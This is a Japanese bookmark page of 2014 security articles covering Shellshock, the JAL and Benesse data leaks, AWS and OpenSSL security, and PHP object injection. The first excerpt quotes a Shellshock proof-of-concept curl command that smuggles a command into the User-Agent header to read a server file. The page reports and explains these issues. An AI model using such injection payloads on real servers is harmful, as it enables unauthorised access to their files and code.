タグ

securityに関するshin1x1のブックマーク (409)

  • BASHの脆弱性でCGIモードで動いてるPHPにアレさせてみました - dogmap.jp

    タイトルはパクリ 元記事: BASHの脆弱性でCGIスクリプトにアレさせてみました – ブログ – ワルブリックス株式会社 sakura のレンタルサーバが cgi モードで php 動かしてるよなーと思ってテストしてみたらできました。 # テストスクリプトは削除済みです。 test.php test.sh #!/usr/local/bin/bash echo "Content-type: text/plain" echo echo "Hi! I'm an ordinary CGI script which is executed by /usr/local/bin/bash" 結果 : Apache CGI版 PHP $ curl -A '() { :;}; echo Content-type:text/plain;echo;/bin/cat test.php' http://wokam

    shin1x1
    shin1x1 2014/09/25
    ありがたい
  • BASHの脆弱性でCGIスクリプトにアレさせてみました

    環境変数に仕込まれたコードを実行してしまうBASHの脆弱性が CGIスクリプトに影響を与えるか試してみたら結果は悲惨な感じに Tweet 2014年9月25日 嶋田大貴 この記事は2014年のものです 朝から Bash specially-crafted environment variables code injection attack なるもので騒ぎになっていたので、さっそく手元の Apacheで試してみました。 /hoge.cgiというURIで実行されるように、一行のメッセージを出力するだけの CGIスクリプトを設置します。いっけん、なんの入力もクライアント側から受け付けていないため危険のありようもなく見えます。 #!/bin/sh echo "Content-type: text/plain" echo echo "Hi! I'm an ordinary CGI script w

    BASHの脆弱性でCGIスクリプトにアレさせてみました
  • [CentOS] Centos 7 + SystemD + Predictable Network Interface Names

    [CentOS] Centos 7 + SystemD + Predictable Network Interface Names Jonathan Billings billings at negate.org Wed Sep 24 15:20:16 UTC 2014 Previous message: [CentOS] Centos 7 + SystemD + Predictable Network Interface Names Next message: [CentOS] Centos 7 + SystemD + Predictable Network Interface Names Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] On Wed, Sep 24, 2014 at 10:04:39AM -0

    shin1x1
    shin1x1 2014/09/25
    "You should 'yum update' as soon as possible to resolve this issue."
  • Bash specially-crafted environment variables code injection attack

    This article was originally published on the Red Hat Customer Portal. The information may no longer be current. Update 2014-09-30 19:30 UTC Questions have arisen around whether Red Hat products are vulnerable to CVE-2014-6277 and CVE-2014-6278.  We have determined that RHSA-2014:1306, RHSA-2014:1311, and RHSA-2014:1312 successfully mitigate the vulnerability and no additional actions need to be ta

    Bash specially-crafted environment variables code injection attack
  • 日本航空の顧客管理システムへの不正アクセスについてまとめてみた - piyolog

    2014年9月24日、日航空(以降JALと表記)が同社のPCがウイルスに感染し、顧客情報(JALマイレージバンク会員情報)が流出した可能性があると発表しました。ここではその関連情報をまとめます。 公式発表 2014年9月24日 JAL顧客情報管理システムへの不正アクセスによる個人情報漏えいの可能性について(魚拓) 2014年9月24日 JALマイレージバンク特典「Amazonギフト券への特典交換サービス」の再開延期について(魚拓) 2014年10月29日 JAL顧客情報システムへの不正アクセスによる一部のお客さまの個人情報漏えいの特定について(中間報告)(魚拓) 2015年1月21日 定例記者会見(2015年1月21日)(魚拓) 2015年1月21日 JAL顧客情報システムへの不正アクセスによるお客さま情報の漏えいについて<最終報告> (魚拓) 2015年1月21日 (PDF) 検証報告

    日本航空の顧客管理システムへの不正アクセスについてまとめてみた - piyolog
  • JAL顧客情報システムへの不正アクセスによる お客さま情報の漏えいについて<最終報告> (2015年1月21日)

    JAL顧客情報システムへの不正アクセスによる お客さま情報の漏えいについて<最終報告> 2014年9月に判明した顧客情報システムへの不正アクセスによるJALマイレージバンク(JMB)会員のお客さま情報の漏えいにつきまして、社内調査を完了し、JMB会員の一部(4,131名様)のお客さま情報(*1)の漏えいを確定しましたのでご報告いたします。件につきましては、2014年10月31日に設置した社外の独立役員から構成される検証委員会(*2)による検証が行われ、社内調査の内容および今後の対応について了承されています。 なお、クレジットカード番号、JMBパスワードの漏えいはありませんでした。特典交換などのマイレージプログラムは通常通りご利用いただけます(*3)。 お客さまならびに関係の皆さまには、ご心配およびご迷惑をおかけいたしましたことを、心よりお詫び申し上げます。 情報セキュリティに関しましては

    JAL顧客情報システムへの不正アクセスによる お客さま情報の漏えいについて<最終報告> (2015年1月21日)
  • とある診断員と色々厄介な脆弱性達

    2. 自己紹介 セキュリティエンジニアやってます。 脆弱性診断業務を担当しており、専門はWebセキュリ ティです。 趣味で脆弱性の検証したり、最近はCTFイベントなどに 参加してたりします。 TwitterID: tigerszk 3. Webアプリの脆弱性ってどんなの? Webアプリの脆弱性達 SQLインジェクション OSコマンドインジェクション パス名パラメータの未チェック/ディレクトリ・トラバーサル セッション管理の不備 クロスサイト・スクリプティング CSRF HTTPヘッダ・インジェクション メールヘッダインジェクション アクセス制御や認可制御の欠落 IPA「安全なウェブサイトの作り方」より https://www.ipa.go.jp/security/vuln/websecurity.html 例えばこんなのがありますね

    とある診断員と色々厄介な脆弱性達
  • AWS で作るシステムのセキュリティ考 - 水深1024m

    AWS アカウントを複数人で使ってシステムを作っていく時に、 セキュリティの面からやるべきことについて。 主に Web アプリケーションを想定した内容ですが、特に書いてあることは特殊ではないと思います。 各所の Blog にも記事書かれてますが思っていることをつらつらと書いてみます。 なんか変なこと言ってたらご指摘ください。 参考: AWSセキュリティが気になるなら読んでおくべきAWSセキュリティのベストプラクティス - yoshidashingo はじめに (AWS アカウントと IAM ユーザ) 前提というか用語の話。 AWS アカウント アカウント作成時のメールアドレス、パスワードでログインして使うユーザ IAM ユーザ AWS アカウントから発行できる、ユーザ名とパスワードでログインして使うユーザ AWS アカウント周り AWS アカウント (ルートユーザ) で作業できないように

    AWS で作るシステムのセキュリティ考 - 水深1024m
  • 無線LANを暗号化すればのぞき見されないという誤解

    今日のニュースに次のようなものがありました。 無線LANのメール丸見え 成田、関西、神戸の3空港 成田、関西、神戸の3空港が提供する無料の公衆無線LANサービスでインターネットを利用した場合、送信したメールの宛先や中身、閲覧中のウェブサイトのURLを他人がのぞき見できる状態になることが26日、神戸大大学院の森井昌克教授(情報通信工学)の実地調査で確認された。 無線LANを暗号化すればのぞき見を防止できるが、パスワードの入力などが必要となり、3空港は利便性を考慮し暗号化していないという。 無線LANのメール丸見え 成田、関西、神戸の3空港 - 47NEWS(よんななニュース)より引用 「無線LANを暗号化すればのぞき見を防止できる」というのは、誤解です。 無線LANの暗号化方式には複数あり、WEP, TKIP, CCMP(AES)の3種類が使われています。これらは暗号化の方式を定めただけで、

    shin1x1
    shin1x1 2014/08/27
    "WPA2-Personalは、家庭内のように全員が信頼できる環境で安全な無線LANを構築するには十分なもので、有線LANに近い水準のセキュリティが実現できます。不特定多数がPSKを知っている環境では意味が無い"
  • AWSのセキュリティが気になるなら読んでおくべきAWSセキュリティのベストプラクティス - yoshidashingo

    cloudpackエバンジェリストの吉田真吾(@yoshidashingo)です。 昨日、DevLOVE現場甲子園2014東日大会に参加して現場目線でのAWSセキュリティあるある的な話をして来ました。 その際にAWSセキュリティ全般について知りたい場合に何を読めばいいか質問されたので、こちらで紹介しておきたいと思います。 AWSセキュリティセンター 1. AWSセキュリティ概要 ストレージデバイスの廃棄**の章では、ストレージデバイスが製品寿命に達した場合に、DoD 5220.22-M または NIST 800-88 に記載されている技術を用いてサニタイズを行ってから廃棄されるということが書かれています。 2. AWSセキュリティのベストプラクティス AWSの共有責任モデルを知る (1) Infrastructure servicesにおける共有責任モデル (2) Container

    AWSのセキュリティが気になるなら読んでおくべきAWSセキュリティのベストプラクティス - yoshidashingo
  • EmEditor 更新チェックによるウィルス感染の可能性について – EmEditor (テキストエディタ)

    日頃より EmEditor をご利用いただき、誠にありがとうございます。 日時間の 8/18 午後 10:36 から 8/19 午前 3:20 (推定) の最大約5時間弱の間に、EmEditor ホーム ページ上のサブ フォルダに、ハッカーにより、悪意のあるファイルが置かれているのが見つかりました。これにより、ある特定の IP アドレスから、EmEditor の更新チェックの機能を利用すると、EmEditor の更新ファイルではなく、悪意のあるファイルがインストールされてしまう可能性があったことがわかりました。 IP アドレスの一覧は次の通りです。 * は、0 から 255 の任意の数字であることを示します。以下の IP アドレスについては、この * の範囲の 256 個のすべての IP アドレスが、問題に該当します。 12.44.85.* 12.189.27.* 12.233.153.

    shin1x1
    shin1x1 2014/08/19
    これ怖いな。EmEditor を使っている方はご確認を。
  • ログインでお困りの方

    ANAウェブサイトへのログインには、ANAマイレージクラブお客様番号(10桁)とWebパスワードが必要です。

    ログインでお困りの方
    shin1x1
    shin1x1 2014/08/18
    ANAマイレージクラブの Web パスワードが「任意の英文字(大小)と数字で構成する8桁以上16桁以下のパスワード」に。
  • 妻に公開鍵暗号を教えてみた - 西尾泰和のはてなダイアリー

    何気なく放送大学をつけていたら公開鍵暗号の話をしていた。 「この話、何度聞いてもわかんないのよね」 僕「え、どこがわからない?どこまではわかってる?」 「平文はわかるけど、鍵を共有するとか秘密にするとか、署名するとかがよくわからない」 僕「あー、鍵に例えているのが逆効果なのか」 「鍵」をNGワードに指定 僕「じゃあ『鍵』という言葉を使わずに説明してみよう。暗号って『平文を暗号文に変換する方法』で伝えたい文章を暗号文に変えて送り、受け取った人はそれに『暗号文を平文に戻す方法』を使って元の文章を得るわけだ。その目的は、途中の通信文が敵に取られたりしても通信の内容がバレないようにするため。」 「うん」 僕「昔の暗号化の方法は、片方の方法がわかるともう片方の方法も分かった。例えば『アルファベットを後ろに1個ずつずらすと平文に戻せます』って教えてもらったら、『なるほど、前に1個ずつずらせば暗号

    妻に公開鍵暗号を教えてみた - 西尾泰和のはてなダイアリー
    shin1x1
    shin1x1 2014/08/10
    なるほど。南京錠は、一つの例えとして、まだイメージしやすいかもね。
  • OpenSSLの脆弱性(CVE-2014-3511)でTLSプロトコルの基礎を学ぶ - ぼちぼち日記

    1. はじめに、 昨日 OpenSSLのバージョンアップがアナウンスされ、9つの脆弱性が公開されました。バージョンアップの数日前にOpenSSLの次期リリース予告がアナウンスされていましたが、ちょうど BlackHat 開催初日にあたることもあり、なんかまた重大な脆弱性の修正が入るんじゃないかとドキドキしていました。蓋を開けてみるとHeatBleed程の大事ではなくホットひと安心です。 昨日公開されたOpenSSLの9つの脆弱性のうち、TLS プロトコルダウングレード攻撃 (CVE-2014-3511)の修正を見ていたところ、これはTLSプロトコルを学ぶいい題材になるなぁとふと思いつき、試しにこのOpensslの脆弱性の詳細をTLSプロトコルの基礎に合わせて書いてみました。 ちょっと長いですが、TLSプロトコルの仕組み(の一部)を知りたい方はお読みください。 2. OpenSSLの脆弱性

    OpenSSLの脆弱性(CVE-2014-3511)でTLSプロトコルの基礎を学ぶ - ぼちぼち日記
  • CakePHP1.3.20、2.5.3で修正されたデータが全件更新されるやつを調べてみた « DASALOG -ださろぐ

    http://bakery.cakephp.org/articles/markstory/2014/07/21/cakephp_2_5_3_and_1_3_20_released 7/21に久々に1.3系を含むCakeのアップデートがリリースされました。 1.3系も更新されるやつは大体やばいやつ、ということで今回も何やらやばそうな事が書いてあります。 The 1.3.20 release contains an important fix to address a potential race condition in Model::save() that can cause data loss when records are deleted during concurrent updates. data lossとはどういうことか、実際に試して確認してみました。 結論 save(upd

    CakePHP1.3.20、2.5.3で修正されたデータが全件更新されるやつを調べてみた « DASALOG -ださろぐ
  • Cookieを使わずにユーザーを追跡する仕組みが普及しつつある | スラド IT

    Canvas機能を使った文字やグラフィックス描画の際の挙動の違いでWebブラウザの違いを識別する「Canvas Fingerprinting」という技術が開発され、すでにトップ10万のサイト中5.5%がこれを使ったユーザー追跡を利用しているという。 また、ユーザがCookieをこまめに削除しても、サイト側が同じデータをFlashのローカル共有オブジェクト(LSO、Flash Cookie)などに保存しておいて回復させれば、実質的にCookieを不滅化することができる。このEvercookieを実現する手段の一つである「Respawning by Flash cookie」sは、人気上位200サイトのうち10サイトで検出されたそうだ。 Cookieを無効にしていても、適切な対処をしない限り、閲覧者の行動はかなりの割合で漏洩している可能性があるようだ。 Canvas Fingerprintin

  • PHPにおけるオブジェクトインジェクション脆弱性について — A Day in Serenity (Reloaded) — PHP, CodeIgniter, FuelPHP, Linux or something

    SQLインジェクションはかなり有名になりましたが、オブジェクトインジェクションはまだあまり聞かないので、まとめておきます。 Dependency Injection(DI)とは関係ありません。 オブジェクトインジェクション脆弱性とは? SQLインジェクションが外部からSQL文を注入する攻撃であるのと同じように、オブジェクトインジェクションとは外部からオブジェクトを注入する攻撃です。 外部からオブジェクトを注入できれば、そのオブジェクトの機能によりさまざまな攻撃ができる可能性があります。最悪の場合、任意のコードを実行できる脆弱性になります。 PHPの場合、この攻撃が可能なのは、unserialize()関数を悪用できる場合です。 攻撃の方法 unserialize()関数に外部から任意のデータを渡すコードがあった場合、攻撃者は自由にシリアライズされたデータを送信することで、生成されるオブジェ

  • Suhosin comes back from the dead, bringing security to newest PHP versions

    Suhosin comes back from the dead, bringing security to newest PHP versions While everyone has been distracted admiring PHP-NG, a great PHP project has quietly come back from the dead – Suhosin ! Suhosin is a well regarded security extension for PHP by Stefan Esser that had stopped getting updates after PHP 5.3. Perhaps it was due to more dramatic internal changes to the PHP core with 5.4 making it

    Suhosin comes back from the dead, bringing security to newest PHP versions
  • ベネッセが埋めた名簿屋のミッシング・ピース - 雑種路線でいこう

    数百万件規模の個人情報漏洩であれば、過去にも10年前のYahoo! BB事件を筆頭に諸々あったけれども、それが実際に名簿屋で売買され、漏洩元の競合他社からDMが届くなど、露骨なデータ活用まで確認された事案としては史上最大規模ではないか。我が家にもジャストシステムからDMが届いたし、子持ちの知り合いには軒並み届いているようだ。データを販売した名簿屋が堂々と宣伝しているのも新時代の到来を感じさせる。別会社までつくって大層な力の入れようだが、社名と代表者を変えても同じCMS、キャッチフレーズ、代表挨拶、住所では頭隠して尻隠さず、よほど大きなビジネスチャンスと期待したのだろうか。こうやっていくつもの会社をつくって個人データを転売されてしまうと、個別にオプトアウトしても意味がなくなってしまう。 弊社が提供する通信教育サービス等のお客様に関する情報 約760万件(最大可能性 約2070万件) ・郵便

    ベネッセが埋めた名簿屋のミッシング・ピース - 雑種路線でいこう
  • ベネッセの情報漏えいをまとめてみた。 - piyolog

    2014年7月9日、ベネッセホールディングス、ベネッセコーポレーションは同社の顧客情報が漏えいしたと発表を行いました。ここではその関連情報をまとめます。 (1) 公式発表と概要 ベネッセは同社の顧客情報が漏えい、さらに漏えいした情報が第三者に用いられた可能性があるとして7月9日に発表をしました。また7月10日にDM送付を行ったとしてジャストシステムが報じられ、それを受けて同社はコメントを出しています。またさらにその後取引先を対象として名簿を販売したと報じられている文献社もコメント及び対応について発表しています。7月17日にECCでも漏えい情報が含まれた名簿を使ってDMの発送が行われたと発表しています。 ベネッセホールディングス(以下ベネッセHDと表記) (PDF) お客様情報の漏えいについてお詫びとご説明 (PDF) 7月11日付株式会社ジャストシステムのリリースについて (PDF) 個人

    ベネッセの情報漏えいをまとめてみた。 - piyolog
    shin1x1
    shin1x1 2014/07/10
    わかりやすいまとめ